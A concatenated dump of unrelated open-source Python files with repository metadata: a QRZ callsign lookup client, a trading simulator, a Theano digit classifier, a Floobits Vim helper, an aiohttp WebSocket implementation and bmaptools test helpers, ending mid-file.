print 'square root of 16'
return 16 ** (1 / 2.0)
task_runner.Run(SampleTask)
self.ExecuteDeferredTasks(task_runner._TASK_QUEUE_NAME)
call_arg = self._GetMockCallArg(add_report_to_log_mock, 1)
self.assertIn('4.0', call_arg)
self.assertIn('square root of 16', call_arg)
|
bsd-3-clause
| 4,223,666,183,864,671,000 | 29.76087 | 80 | 0.695406 | false |
tscloud/hamsalad
|
callservice_class.py
|
1
|
6917
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
# Copyright (C) 2014 Tom Cloud
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# See file LICENSE which should have been include w/ this software for a
# copy of the license as well as other copyright and license information.
"""
import xml.dom.minidom as mdom, getpass, sys, os, urllib2
class Callservice(object):
"""
This class is a super class to handle service calls to get call sign info
"""
PRINT_SESSION = False
MAX_LOGIN_TRIAL = 3
def __init__(self, agent_name, fpath_name):
"""
setup class
"""
self.SERVICE_PROVIDER = None
self.tag_session = None
self.tag_callsign = None
self.tag_error = None
self.tag_sessionid = None
self.VALID_TAGS = []
self.fpath_agent = fpath_name + '.' + agent_name
self.login_url = None
self.query_url = None
self.session_d = None
@classmethod
def cleanup_one_call(cls, one_call):
"""
get rid of call suffixes b/c qrz does not like them
could do other things
"""
r_idx = one_call.find('/')
if r_idx != -1:
one_call = one_call[:r_idx]
return one_call
@classmethod
def cleanup_call(cls, c_list):
"""
get rid of call suffixes b/c qrz does not like them
could do other things
"""
for i, clean_call in enumerate(c_list):
c_list[i] = Callservice.cleanup_one_call(clean_call)
return c_list
def get_info(self, rt, tag_name):
"""
get_info collects data into dictionary from XML tags specified by subclass
according to service provider.
"""
#print >>sys.stderr, 'get_info...'
ans_d = {}
if not tag_name in self.VALID_TAGS:
return None # error
rtelements = rt.getElementsByTagName(tag_name)
if len(rtelements) < 1:
return None # error
s_elems = rtelements[0].getElementsByTagName('*')
for s in s_elems:
for ss in s.childNodes:
# Ignore if not a text node...
if ss.nodeName == '#text':
ans_d[s.nodeName] = ss.nodeValue
return ans_d
def login(self):
"""
Log in and get session key, prompt if valid key not previously stored.
"""
# need a local so old values are not preserved across calls
l_login_url = None
fr = None
for login_trial in range(Callservice.MAX_LOGIN_TRIAL):
try:
fr = open(self.fpath_agent, 'r') # Do we have a .qrzpy file already?
except IOError: # No, must create one.
print 'Please provide login info for %s XML service...' % self.SERVICE_PROVIDER
user = raw_input('Username: ')
pwd = getpass.getpass('Password: ')
### here's where we set the login URL
l_login_url = self.login_url % (user, pwd)
# Unix dependencies
try:
fw = open(self.fpath_agent, 'w')
fw.write(l_login_url)
except:
print >>sys.stderr, sys.exc_info()[1]
print >>sys.stderr, '** Can\'t write to %s' % self.fpath_agent
sys.exit()
fw.close()
os.chmod(self.fpath_agent, 0600) # a little security
else:
### here's where we set the login URL
l_login_url = fr.read().strip()
# We've got a login_url, but will it be accepted?
fd = urllib2.urlopen(l_login_url)
doc = mdom.parse(fd) # Construct DOM w/ Python heavy lifting
rt = doc.documentElement # Find root element
self.session_d = self.get_info(rt, self.tag_session)
if self.tag_error in self.session_d: # No, that key won't work.
print >>sys.stderr, '** Error ** %s' % self.session_d[self.tag_error]
print 'Reenter password info, please.'
# Unix dependency: remove .qrzpy file if it exists
try:
fr.close()
os.remove(self.fpath_agent)
except OSError:
pass
continue # try again, please.
break # We're authenticated OK now, stop loop
else: # End of 'for' loop, no success
print >>sys.stderr, 'Login trial limit exceeded. Sorry'
sys.exit()
if 'Alert' in self.session_d:
print '** Alert ** %s' % self.session_d['Alert']
if 'Expires' in self.session_d:
print 'Note: QRZ.com account expires %s' % self.session_d['Expires']
if Callservice.PRINT_SESSION: # This is usually uninteresting
print '--------Session'
for x in self.session_d:
print x, self.session_d[x]
print
fd.close()
def get_data_for_call(self, call):
"""
For requested call, get its data.
"""
# remember QRZ needs call to be cleaned up
### here's where we set the query URL
l_query_url = self.query_url % (self.session_d[self.tag_sessionid], Callservice.cleanup_one_call(call))
fd = urllib2.urlopen(l_query_url) # access XML record from Internet
doc = mdom.parse(fd) # Construct DOM with Python magic
rt = doc.documentElement # Find root element
fd.close()
# print >>sys.stderr, 'About to retrun from call to %s' % self.SERVICE_PROVIDER
# return self.get_info(rt, 'Callsign') # Place XML data into friendly dictionary
return self.get_info(rt, self.tag_callsign) # Place XML data into friendly dictionary
def removefile(self):
"""
remove agent file
"""
try:
os.remove(self.fpath_agent)
except:
print >>sys.stderr, '** %s could not be removed.' % self.fpath_agent
else:
print '%s removed.' % self.fpath_agent
if __name__ == '__main__':
print >>sys.stderr, "cannot run form cmd line"
|
agpl-3.0
| -3,144,253,205,164,794,000 | 36.797814 | 111 | 0.556021 | false |
hchim/stockanalyzer
|
simulator/TradeSimulator.py
|
1
|
4978
|
import pandas as pd
import numpy as np
from utils.webdata import get_close_of_symbols
class TradeSimulator(object):
def __init__(self, start_val=1000000, leverage=2.0, allow_short=True):
"""
Parameters
----------
start_val: float
start value of the portfolio
leverage: float
max leverage
allow_short: boolean
allows to sell short
"""
self.start_val = start_val
self.leverage = leverage
self.allow_short = allow_short
def compute_leverage(self, prices, shares, cash, order_type, order_share, order_symbol):
"""
Compute the leverage of the shares
Parameters
----------
prices: Series
shares: dict
contains the current shares for each symbol
cash: float
current cash
order_type: [BUY or SELL]
the type of the order
order_share: int
the number of shares of the order
order_symbol: string
the symbol of the order
Returns
----------
leverage: float
"""
if order_type == 'BUY':
shares[order_symbol] += order_share
cash -= prices[order_symbol] * order_share
else:
shares[order_symbol] -= order_share
cash += prices[order_symbol] * order_share
longs = shorts = 0
for symbol in shares.keys():
if shares[symbol] >= 0:
longs += shares[symbol] * prices[symbol]
else:
shorts -= shares[symbol] * prices[symbol]
leverage = (longs + shorts) / (longs - shorts + cash)
return leverage
def simulate(self, start_date=None, end_date=None, prices=None, orders=None, orders_file=None):
"""Simulate the trades with the given orders and the prices.
Parameters
----------
start_date: string
end_date: string
prices: DataFrame
orders: DataFrame
orders_file: string
Returns
----------
portvals: DataFrame
the daily portfolio values in the simulation
"""
if orders is None:
orders = pd.read_csv(orders_file, parse_dates=True)
symbols = list(set(orders['Symbol']))
if prices is None:
prices = get_close_of_symbols(symbols, start_date, end_date, add_spy=True) # add SPY so as to remove no-trade days
if prices is None:
return None
prices.drop('SPY', axis=1, inplace=True) # remove SPY
dates = prices.index # update dates
# init daily shares
shares = prices.copy() # record the shares every day
shares.loc[:, :] = np.nan
last_share = dict.fromkeys(shares.columns, 0) # record the total shares of each symbol
# init daily cashes
cashes = pd.Series({'Cash':np.nan}, index=dates) # record the daily cashes
last_cash = self.start_val # record total cash
# iterate orders and simulate the trades
for i in range(len(orders)):
symbol = orders.loc[i, 'Symbol']
share = orders.loc[i, 'Shares']
date = orders.loc[i, 'Date']
operate = orders.loc[i, 'Order']
price = prices.loc[date, symbol]
# check leverage
tmp_leverage = self.compute_leverage(prices.loc[date, :], last_share.copy(), last_cash,
operate, share, symbol)
if tmp_leverage > self.leverage:
continue
if operate == 'BUY':
last_share[symbol] += share
shares.loc[date, symbol] = last_share[symbol]
val = last_cash - price * share
cashes[date] = last_cash = val
else:
temp_share = last_share[symbol] - share
# short check
if not self.allow_short and temp_share < 0:
continue
shares.loc[date, symbol] = last_share[symbol] = temp_share
last_cash += price * share
cashes[date] = last_cash
# init the nan values of the first row of shares before invoking fillna
for symbol in shares.columns:
if pd.isnull(shares.loc[dates[0], symbol]):
shares.loc[dates[0], symbol] = 0
shares.fillna(method="ffill", inplace=True)
# init the nan value of the first row of cashes before invoking fillna
if pd.isnull(cashes.ix[0]):
cashes.ix[0] = self.start_val
cashes.fillna(method='ffill', inplace=True)
values = (prices * shares).sum(axis=1)
portvals = (values + cashes).to_frame()
portvals.rename(columns={portvals.columns[0]: "Portfolio"}, inplace=True)
return portvals
|
mit
| -7,645,321,113,309,966,000 | 33.811189 | 126 | 0.537364 | false |
WillBrennan/DigitClassifier
|
DeepConv.py
|
1
|
8479
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Will Brennan'
# Built-in Module
import os
import time
import logging
import warnings
import cPickle as pickle
from datetime import datetime
# Standard Modules
import numpy
import sklearn
import theano
import theano.tensor as T
# Custom Modules
import Scripts
import Layers
logger = logging.getLogger('main')
warnings.simplefilter("ignore", DeprecationWarning)
class DeepConv(object):
def __init__(self, debug=False, load=False, save=False):
self.args_debug = debug
self.args_load = load
self.args_save = save
if self.args_debug:
theano.exception_verbosity = 'high'
if self.args_load:
self.load()
else:
self.layers = None
self.test_model = None
self.validate_model = None
self.train_model = None
self.pred_model = None
self.index, self.x, self.y = T.lscalar(), T.matrix('x'), T.ivector('y')
def fit(self, data, labels, test_data, test_labels, learning_rate=0.1, n_epochs=250, nkerns=[20, 50], batch_size=500):
logger.info('Initialising the classifier')
rng = numpy.random.RandomState()
data, labels = Scripts.shared_dataset(data_x=data, data_y=labels)
test_data, test_labels = Scripts.shared_dataset(data_x=test_data, data_y=test_labels)
if batch_size < 1:
batch_size = data.get_value(borrow=True).shape[0]
n_train_batches = data.get_value(borrow=True).shape[0]/batch_size
n_test_batches = test_data.get_value(borrow=True).shape[0]/batch_size
logger.info('Constructing the classifier')
self.layers = []
self.layers.append(Layers.PoolingLayer(
rng,
input=self.x.reshape((batch_size, 1, 28, 28)),
image_shape=(batch_size, 1, 28, 28),
filter_shape=(nkerns[0], 1, 5, 5),
poolsize=(2, 2)
))
self.layers.append(Layers.PoolingLayer(
rng,
input=self.layers[-1].output,
image_shape=(batch_size, nkerns[0], 12, 12),
filter_shape=(nkerns[1], nkerns[0], 5, 5),
poolsize=(2, 2)
))
self.layers.append(Layers.HiddenLayer(
rng,
input=self.layers[-1].output.flatten(2),
n_in=nkerns[1] * 4 * 4,
n_out=500,
activation=T.tanh
))
self.layers.append(Layers.LogisticRegression(
input=self.layers[-1].output,
n_in=500,
n_out=10
))
test_givens = {self.x: test_data[self.index * batch_size: (self.index + 1) * batch_size], self.y: test_labels[self.index * batch_size: (self.index + 1) * batch_size]}
self.test_model = theano.function([self.index], self.layers[-1].errors(self.y), givens=test_givens)
params = self.layers[0].params + self.layers[1].params + self.layers[2].params + self.layers[3].params
cost = self.layers[-1].negative_log_likelihood(self.y)
grads = T.grad(cost, params)
updates = [(param_i, param_i - learning_rate * grad_i) for param_i, grad_i in zip(params, grads)]
train_givens = {self.x: data[self.index * batch_size: (self.index + 1) * batch_size], self.y: labels[self.index * batch_size: (self.index + 1) * batch_size]}
self.train_model = theano.function([self.index], cost, updates=updates, givens=train_givens)
patience, patience_increase = 10000, 2
validation_frequency = min(n_train_batches, patience / 2)
epoch, count = 0, 0
start_time = time.time()
n_iters = n_epochs*n_train_batches
logger.info("Fitting Classifier")
logger.debug("{0} epochs, {1} batches, {2} iterations".format(n_epochs, n_train_batches, n_iters))
while epoch < n_epochs and patience > count:
epoch += 1
for minibatch_index in xrange(n_train_batches):
count = (epoch - 1) * n_train_batches + minibatch_index
if count % 50 == 0:
percentage = round(100.0*count/n_iters, 2)
if percentage == 0:
time_stamp = "Null"
else:
time_stamp = datetime.utcfromtimestamp((time.time()-start_time)*(100.0/percentage)+start_time)
logger.info("training is {0}% complete (Completion at {1})".format(round(percentage, 2), time_stamp))
train_cost = self.train_model(minibatch_index)
if (count + 1) % validation_frequency == 0:
testlosses = [self.test_model(i) for i in xrange(n_test_batches)]
test_score = numpy.mean(testlosses)
logger.info('Test error of {0}% achieved on Epoch {1} Iteration {2}'.format(test_score*100.0, epoch, count+1))
logger.debug("Iteration number {0}".format(count))
logger.debug('Optimization complete.')
logger.debug('Conducting final model testing')
testlosses = [self.test_model(i) for i in xrange(n_test_batches)]
test_score = numpy.mean(testlosses)
t_taken = int((time.time()-start_time)/60.0)
logger.info('Training Complete')
logger.info('Test score of {0}%, training time {1}m'.format(test_score*100.0, t_taken))
if self.args_save:
self.save()
def predict(self, x_data, batch_size=500):
assert isinstance(x_data, numpy.ndarray), "input features must be a numpy array"
assert len(x_data.shape) == 2, "it must be an array of feature vectors"
logger.info('classifier prediction called')
logger.debug('x_data shape: {0}'.format(x_data.shape))
logger.debug('forming prediction function')
x_data = Scripts.shared_dataset(data_x=x_data)
givens = {self.x: x_data[self.index * batch_size: (self.index + 1) * batch_size]}
pred_model = theano.function(inputs=[self.index], outputs=self.layers[-1].y_pred, givens=givens, on_unused_input='warn', allow_input_downcast=True)
logger.debug('input shape: {0}'.format(x_data.get_value(borrow=True).shape))
logger.info('beginning prediction on x_data')
n_batches = x_data.get_value(borrow=True).shape[0]/batch_size
result = []
for batch_index in range(n_batches):
logger.debug('processing batch {0}'.format(batch_index))
batch_result = pred_model(batch_index)
logger.debug('result generated')
result = numpy.hstack((result, batch_result))
logger.debug('output shape: {0}'.format(len(result)))
# batch size, rows, columns, channels.
return result
def score(self, test_data, test_labels, batch_size=500):
logger.info('Generating Classification Score')
logger.debug('creating shared datasets')
test_data, test_labels = Scripts.shared_dataset(data_x=test_data, data_y=test_labels)
logger.debug('producing batch information')
n_test_batches = test_data.get_value(borrow=True).shape[0]
n_test_batches /= batch_size
logger.debug('generating theano functions')
test_givens = {self.x: test_data[self.index * batch_size: (self.index + 1) * batch_size], self.y: test_labels[self.index * batch_size: (self.index + 1) * batch_size]}
test_model = theano.function(inputs=[self.index], outputs=self.layers[-1].errors(self.y), givens=test_givens, on_unused_input='warn')
logger.debug('producing test results')
losses = [test_model(i) for i in range(n_test_batches)]
return 1.0-numpy.mean(losses)
def score_report(self, y_test, y_pred):
scores = sklearn.metrics.classification_report(y_test, y_pred)
logger.info("\n"+scores)
def save(self, path="DeepConvolution.pkl"):
path = os.path.join(os.path.split(__file__)[0], path)
logger.info("Saving layers to {0}".format(path))
with open(path, 'wb') as output:
pickle.dump(self.layers, output, pickle.HIGHEST_PROTOCOL)
logger.debug("Successfully saved")
def load(self, path="DeepConvolution.pkl"):
path = os.path.join(os.path.split(__file__)[0], path)
logger.info("Loading layers from {0}".format(path))
assert os.path.exists(path), "Specified Path is not valid"
with open(path, "rb") as input_file:
self.layers = pickle.load(input_file)
logger.debug("Successfully loaded")
|
bsd-2-clause
| 1,989,639,045,380,812,300 | 47.176136 | 174 | 0.608916 | false |
Floobits/floobits-neovim-old
|
plugin/floo/editor.py
|
1
|
2900
|
import sys
from collections import defaultdict
import time
import vim
try:
from .common import shared as G
from .common import msg
except (ImportError, ValueError):
import common.shared as G
from common import msg
timeouts = defaultdict(list)
top_timeout_id = 0
cancelled_timeouts = set()
calling_timeouts = False
line_endings = "\n"
welcome_text = 'Welcome %s!\n\nYou are all set to collaborate. You should check out our docs at https://%s/help/plugins/#sublime-usage. \
You must run \':FlooCompleteSignup\' before you can login to floobits.com.'
def name():
if sys.version_info < (3, 0):
py_version = 2
else:
py_version = 3
return 'Vim-py%s' % py_version
def codename():
return 'vim'
def windows(*args, **kwargs):
return []
def set_timeout(func, timeout, *args, **kwargs):
global top_timeout_id
timeout_id = top_timeout_id
top_timeout_id + 1
if top_timeout_id > 100000:
top_timeout_id = 0
def timeout_func():
if timeout_id in cancelled_timeouts:
cancelled_timeouts.remove(timeout_id)
return
func(*args, **kwargs)
then = time.time() + (timeout / 1000.0)
timeouts[then].append(timeout_func)
return timeout_id
def cancel_timeout(timeout_id):
if timeout_id in timeouts:
cancelled_timeouts.add(timeout_id)
def call_timeouts():
global calling_timeouts
if calling_timeouts:
return
calling_timeouts = True
now = time.time()
to_remove = []
for t, tos in timeouts.items():
if now >= t:
for timeout in tos:
timeout()
to_remove.append(t)
for k in to_remove:
del timeouts[k]
calling_timeouts = False
def error_message(*args, **kwargs):
editor = getattr(G, 'editor', None)
if editor:
editor.error_message(*args, **kwargs)
else:
print(args, kwargs)
def status_message(msg):
editor = getattr(G, 'editor', None)
if editor:
editor.status_message(msg)
else:
print(msg)
def message_dialog(message):
msg.log(message)
def vim_choice(prompt, default, choices):
default = choices.index(default) + 1
choices_str = '\n'.join(['&%s' % choice for choice in choices])
try:
choice = int(vim.eval('confirm("%s", "%s", %s)' % (prompt, choices_str, default)))
except KeyboardInterrupt:
return None
if choice == 0:
return None
return choices[choice - 1]
def ok_cancel_dialog(prompt):
choice = vim_choice(prompt, 'ok', ['ok', 'cancel'])
return choice == 'ok'
def open_file(filename):
current_buffer = vim.eval('expand("%:p")')
if current_buffer != filename:
vim.command(':silent! edit! %s | :silent! :filetype detect' % filename)
def platform():
return sys.platform
def get_line_endings(path=None):
return line_endings
|
apache-2.0
| -7,985,132,652,886,116,000 | 21.65625 | 137 | 0.623103 | false |
saghul/aiohttp
|
aiohttp/websocket.py
|
1
|
8733
|
"""WebSocket protocol versions 13 and 8."""
__all__ = ['WebSocketParser', 'WebSocketWriter', 'do_handshake',
'Message', 'WebSocketError',
'MSG_TEXT', 'MSG_BINARY', 'MSG_CLOSE', 'MSG_PING', 'MSG_PONG']
import base64
import binascii
import collections
import hashlib
import struct
from aiohttp import errors
from aiohttp.log import ws_logger
# Frame opcodes defined in the spec.
OPCODE_CONTINUATION = 0x0
MSG_TEXT = OPCODE_TEXT = 0x1
MSG_BINARY = OPCODE_BINARY = 0x2
MSG_CLOSE = OPCODE_CLOSE = 0x8
MSG_PING = OPCODE_PING = 0x9
MSG_PONG = OPCODE_PONG = 0xa
WS_KEY = b'258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
WS_HDRS = ('UPGRADE',
'CONNECTION',
'SEC-WEBSOCKET-VERSION',
'SEC-WEBSOCKET-KEY',
'SEC-WEBSOCKET-PROTOCOL')
Message = collections.namedtuple('Message', ['tp', 'data', 'extra'])
class WebSocketError(Exception):
"""WebSocket protocol parser error."""
def WebSocketParser(out, buf):
while True:
message = yield from parse_message(buf)
out.feed_data(message)
if message.tp == MSG_CLOSE:
out.feed_eof()
break
def parse_frame(buf):
"""Return the next frame from the socket."""
# read header
data = yield from buf.read(2)
first_byte, second_byte = struct.unpack('!BB', data)
fin = (first_byte >> 7) & 1
rsv1 = (first_byte >> 6) & 1
rsv2 = (first_byte >> 5) & 1
rsv3 = (first_byte >> 4) & 1
opcode = first_byte & 0xf
# frame-fin = %x0 ; more frames of this message follow
# / %x1 ; final frame of this message
# frame-rsv1 = %x0 ; 1 bit, MUST be 0 unless negotiated otherwise
# frame-rsv2 = %x0 ; 1 bit, MUST be 0 unless negotiated otherwise
# frame-rsv3 = %x0 ; 1 bit, MUST be 0 unless negotiated otherwise
if rsv1 or rsv2 or rsv3:
raise WebSocketError('Received frame with non-zero reserved bits')
if opcode > 0x7 and fin == 0:
raise WebSocketError('Received fragmented control frame')
if fin == 0 and opcode == OPCODE_CONTINUATION:
raise WebSocketError(
'Received new fragment frame with non-zero opcode')
has_mask = (second_byte >> 7) & 1
length = (second_byte) & 0x7f
# Control frames MUST have a payload length of 125 bytes or less
if opcode > 0x7 and length > 125:
raise WebSocketError(
"Control frame payload cannot be larger than 125 bytes")
# read payload
if length == 126:
data = yield from buf.read(2)
length = struct.unpack_from('!H', data)[0]
elif length > 126:
data = yield from buf.read(8)
length = struct.unpack_from('!Q', data)[0]
if has_mask:
mask = yield from buf.read(4)
if length:
payload = yield from buf.read(length)
else:
payload = b''
if has_mask:
payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
return fin, opcode, payload
def parse_message(buf):
fin, opcode, payload = yield from parse_frame(buf)
if opcode == OPCODE_CLOSE:
if len(payload) >= 2:
close_code = struct.unpack('!H', payload[:2])[0]
close_message = payload[2:]
return Message(OPCODE_CLOSE, close_code, close_message)
elif payload:
raise WebSocketError(
'Invalid close frame: {} {} {!r}'.format(fin, opcode, payload))
return Message(OPCODE_CLOSE, 0, '')
elif opcode == OPCODE_PING:
return Message(OPCODE_PING, payload, '')
elif opcode == OPCODE_PONG:
return Message(OPCODE_PONG, payload, '')
elif opcode not in (OPCODE_TEXT, OPCODE_BINARY):
raise WebSocketError("Unexpected opcode={!r}".format(opcode))
# load text/binary
data = [payload]
while not fin:
fin, _opcode, payload = yield from parse_frame(buf)
if _opcode != OPCODE_CONTINUATION:
raise WebSocketError(
'The opcode in non-fin frame is expected '
'to be zero, got {!r}'.format(opcode))
else:
data.append(payload)
if opcode == OPCODE_TEXT:
return Message(OPCODE_TEXT, b''.join(data).decode('utf-8'), '')
else:
return Message(OPCODE_BINARY, b''.join(data), '')
class WebSocketWriter:
def __init__(self, writer):
self.writer = writer
def _send_frame(self, message, opcode):
"""Send a frame over the websocket with message as its payload."""
header = bytes([0x80 | opcode])
msg_length = len(message)
if msg_length < 126:
header += bytes([msg_length])
elif msg_length < (1 << 16):
header += bytes([126]) + struct.pack('!H', msg_length)
else:
header += bytes([127]) + struct.pack('!Q', msg_length)
self.writer.write(header + message)
def pong(self, message=b''):
"""Send pong message."""
if isinstance(message, str):
message = message.encode('utf-8')
self._send_frame(message, OPCODE_PONG)
def ping(self, message=b''):
"""Send ping message."""
if isinstance(message, str):
message = message.encode('utf-8')
self._send_frame(message, OPCODE_PING)
def send(self, message, binary=False):
"""Send a frame over the websocket with message as its payload."""
if isinstance(message, str):
message = message.encode('utf-8')
if binary:
self._send_frame(message, OPCODE_BINARY)
else:
self._send_frame(message, OPCODE_TEXT)
def close(self, code=1000, message=b''):
"""Close the websocket, sending the specified code and message."""
if isinstance(message, str):
message = message.encode('utf-8')
self._send_frame(
struct.pack('!H%ds' % len(message), code, message),
opcode=OPCODE_CLOSE)
def do_handshake(method, headers, transport, protocols=()):
"""Prepare WebSocket handshake. It return http response code,
response headers, websocket parser, websocket writer. It does not
perform any IO.
`protocols` is a sequence of known protocols. On successful handshake,
the returned response headers contain the first protocol in this list
which the server also knows."""
# WebSocket accepts only GET
if method.upper() != 'GET':
raise errors.HttpProcessingError(code=405, headers=(('Allow', 'GET'),))
if 'websocket' != headers.get('UPGRADE', '').lower().strip():
raise errors.HttpBadRequest(
message='No WebSocket UPGRADE hdr: {}\n'
'Can "Upgrade" only to "WebSocket".'.format(
headers.get('UPGRADE')))
if 'upgrade' not in headers.get('CONNECTION', '').lower():
raise errors.HttpBadRequest(
message='No CONNECTION upgrade hdr: {}'.format(
headers.get('CONNECTION')))
# find common sub-protocol between client and server
protocol = None
if 'SEC-WEBSOCKET-PROTOCOL' in headers:
req_protocols = [str(proto.strip()) for proto in
headers['SEC-WEBSOCKET-PROTOCOL'].split(',')]
for proto in req_protocols:
if proto in protocols:
protocol = proto
break
else:
# No overlap found: Return no protocol as per spec
ws_logger.warning(
'Client protocols %r don’t overlap server-known ones %r',
protocols, req_protocols)
# check supported version
version = headers.get('SEC-WEBSOCKET-VERSION')
if version not in ('13', '8', '7'):
raise errors.HttpBadRequest(
message='Unsupported version: {}'.format(version),
headers=(('Sec-WebSocket-Version', '13', '8', '7'),))
# check client handshake for validity
key = headers.get('SEC-WEBSOCKET-KEY')
try:
if not key or len(base64.b64decode(key)) != 16:
raise errors.HttpBadRequest(
message='Handshake error: {!r}'.format(key))
except binascii.Error:
raise errors.HttpBadRequest(
message='Handshake error: {!r}'.format(key)) from None
response_headers = [
('UPGRADE', 'websocket'),
('CONNECTION', 'upgrade'),
('TRANSFER-ENCODING', 'chunked'),
('SEC-WEBSOCKET-ACCEPT', base64.b64encode(
hashlib.sha1(key.encode() + WS_KEY).digest()).decode())]
if protocol:
response_headers.append(('SEC-WEBSOCKET-PROTOCOL', protocol))
# response code, headers, parser, writer, protocol
return (101,
response_headers,
WebSocketParser,
WebSocketWriter(transport),
protocol)
|
apache-2.0
| 6,830,857,299,312,674,000 | 31.94717 | 79 | 0.596953 | false |
seiferteric/bmaptools
|
tests/helpers.py
|
1
|
10844
|
# Copyright (c) 2012-2013 Intel, Inc.
# License: GPLv2
# Author: Artem Bityutskiy <artem.bityutskiy@linux.intel.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
"""
This module contains independent functions shared between various
tests.
"""
# Disable the following pylint recommendations:
# * Too many statements (R0915)
# pylint: disable=R0915
import tempfile
import random
import itertools
import hashlib
import sys
from bmaptools import BmapHelpers, BmapCopy, TransRead
def _create_random_sparse_file(file_obj, size):
"""
Create a sparse file with randomly distributed holes. The mapped areas are
filled with semi-random data. Returns a tuple containing 2 lists:
1. a list of mapped block ranges, same as 'Filemap.get_mapped_ranges()'
2. a list of unmapped block ranges (holes), same as
'Filemap.get_unmapped_ranges()'
"""
file_obj.truncate(0)
block_size = BmapHelpers.get_block_size(file_obj)
blocks_cnt = (size + block_size - 1) / block_size
def process_block(block):
"""
This is a helper function which processes a block. It randomly decides
whether the block should be filled with random data or should become a
hole. Returns 'True' if the block was mapped and 'False' otherwise.
"""
map_the_block = random.getrandbits(1)
if map_the_block:
# Randomly select how much we are going to write
seek = random.randint(0, block_size - 1)
write = random.randint(1, block_size - seek)
assert seek + write <= block_size
file_obj.seek(block * block_size + seek)
file_obj.write(chr(random.getrandbits(8)) * write)
else:
file_obj.truncate(block * block_size)
return map_the_block
mapped = []
unmapped = []
iterator = xrange(0, blocks_cnt)
for was_mapped, group in itertools.groupby(iterator, process_block):
# Start of a mapped region or a hole. Find the last element in the
# group.
first = group.next()
last = first
for last in group:
pass
if was_mapped:
mapped.append((first, last))
else:
unmapped.append((first, last))
file_obj.truncate(size)
file_obj.flush()
return (mapped, unmapped)
def _create_random_file(file_obj, size):
"""
Fill the 'file_obj' file object with semi-random data up to the size 'size'.
"""
chunk_size = 1024 * 1024
written = 0
while written < size:
if written + chunk_size > size:
chunk_size = size - written
file_obj.write(chr(random.getrandbits(8)) * chunk_size)
written += chunk_size
file_obj.flush()
def generate_test_files(max_size=4*1024*1024, directory=None, delete=True):
"""
This is a generator which yields files which other tests use as the input
for the testing. The generator tries to yield "interesting" files which
cover various corner-cases. For example, a large hole file, a file with
no holes, files of unaligned length, etc.
The 'directory' argument specifies the directory path where the yielded
test files should be created. The 'delete' argument specifies whether the
yielded test files have to be automatically deleted.
The generator yields tuples consisting of the following elements:
1. the test file object
2. file size in bytes
3. a list of mapped block ranges, same as 'Filemap.get_mapped_ranges()'
4. a list of unmapped block ranges (holes), same as
'Filemap.get_unmapped_ranges()'
"""
#
# Generate sparse files with one single hole spanning the entire file
#
# A block-sized hole
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Khole_",
delete=delete, dir=directory,
suffix=".img")
block_size = BmapHelpers.get_block_size(file_obj)
file_obj.truncate(block_size)
yield (file_obj, block_size, [], [(0, 0)])
file_obj.close()
# A block size + 1 byte hole
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Khole_plus_1_",
delete=delete, dir=directory,
suffix=".img")
file_obj.truncate(block_size + 1)
yield (file_obj, block_size + 1, [], [(0, 1)])
file_obj.close()
# A block size - 1 byte hole
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Khole_minus_1_",
delete=delete, dir=directory,
suffix=".img")
file_obj.truncate(block_size - 1)
yield (file_obj, block_size - 1, [], [(0, 0)])
file_obj.close()
# A 1-byte hole
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="1byte_hole_",
delete=delete, dir=directory,
suffix=".img")
file_obj.truncate(1)
yield (file_obj, 1, [], [(0, 0)])
file_obj.close()
# And 10 holes of random size
for i in xrange(10):
size = random.randint(1, max_size)
file_obj = tempfile.NamedTemporaryFile("wb+", suffix=".img",
delete=delete, dir=directory,
prefix="rand_hole_%d_"%i)
file_obj.truncate(size)
blocks_cnt = (size + block_size - 1) / block_size
yield (file_obj, size, [], [(0, blocks_cnt - 1)])
file_obj.close()
#
# Generate a random sparse files
#
# The maximum size
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="sparse_",
delete=delete, dir=directory,
suffix=".img")
mapped, unmapped = _create_random_sparse_file(file_obj, max_size)
yield (file_obj, max_size, mapped, unmapped)
file_obj.close()
# The maximum size + 1 byte
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="sparse_plus_1_",
delete=delete, dir=directory,
suffix=".img")
mapped, unmapped = _create_random_sparse_file(file_obj, max_size + 1)
yield (file_obj, max_size + 1, mapped, unmapped)
file_obj.close()
# The maximum size - 1 byte
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="sparse_minus_1_",
delete=delete, dir=directory,
suffix=".img")
mapped, unmapped = _create_random_sparse_file(file_obj, max_size - 1)
yield (file_obj, max_size - 1, mapped, unmapped)
file_obj.close()
# And 10 files of random size
for i in xrange(10):
size = random.randint(1, max_size)
file_obj = tempfile.NamedTemporaryFile("wb+", suffix=".img",
delete=delete, dir=directory,
prefix="sparse_%d_"%i)
mapped, unmapped = _create_random_sparse_file(file_obj, size)
yield (file_obj, size, mapped, unmapped)
file_obj.close()
#
# Generate random fully-mapped files
#
# A block-sized file
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Kmapped_",
delete=delete, dir=directory,
suffix=".img")
_create_random_file(file_obj, block_size)
yield (file_obj, block_size, [(0, 0)], [])
file_obj.close()
# A block size + 1 byte file
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Kmapped_plus_1_",
delete=delete, dir=directory,
suffix=".img")
_create_random_file(file_obj, block_size + 1)
yield (file_obj, block_size + 1, [(0, 1)], [])
file_obj.close()
# A block size - 1 byte file
